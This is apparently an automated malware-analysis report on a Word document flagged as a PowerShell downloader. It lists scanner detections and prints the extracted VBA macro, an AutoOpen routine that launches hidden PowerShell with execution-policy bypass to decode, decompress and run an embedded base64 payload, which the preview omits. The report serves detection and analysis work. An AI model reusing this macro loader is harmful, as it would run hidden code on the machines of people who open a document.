Verdict: MALICIOUS
Risk score: 318
Heuristics: 10
Findings:

- ClamAV: Doc.Downloader.Pwshell-10001336-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `Shell exec, vbHide`
- PowerShell reference in VBA (critical, OLE_VBA_PS): PowerShell reference in VBA. Matched line in script: `Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script: `Arch = Environ("PROCESSOR_ARCHITECTURE")`
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3006 bytes | dcc4bd0faccbbd2d385b67da3788a1be1aa30601b6dcacec5a8282916a3484d5 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
'VBA arch detect suggested by "T"
Dim Command As String
Dim str As String
Dim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
Command = "powershell.exe"
End If
' (base64-encoded, deflate-compressed payload string assigned to str is omitted from this preview)
exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""
Shell exec, vbHide
End Sub
```